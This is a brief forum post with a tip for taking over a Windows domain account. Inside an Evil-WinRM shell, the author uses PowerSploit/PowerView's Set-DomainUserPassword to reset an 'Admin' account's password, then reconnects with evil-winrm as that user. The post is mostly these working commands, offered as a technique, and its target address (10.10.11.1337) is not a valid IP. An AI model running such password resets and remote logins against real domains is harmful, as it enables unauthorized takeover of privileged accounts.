Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Changing passwords with PowerSploit/PowerView & Evil-WinRM
#1
Information 
I rarely touch Windows machines but here are some quick tip on how to change passwords with PowerSploit and Evil-WinRM.

*Evil-WinRM* PS C:\programdata> $newpass = ConvertTo-SecureString 'Nohokai' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity Admin -AccountPassword $newpass
Nohokia@DMT$ evil-winrm -i 10.10.11.1337 -u Admin -p 'Nohokai'

-Nohokai
Reply


Messages In This Thread
Changing passwords with PowerSploit/PowerView & Evil-WinRM - by 0xgh64 - 05-17-2022, 03:13 PM

Forum Jump:


Users browsing this thread: 1 Guest(s)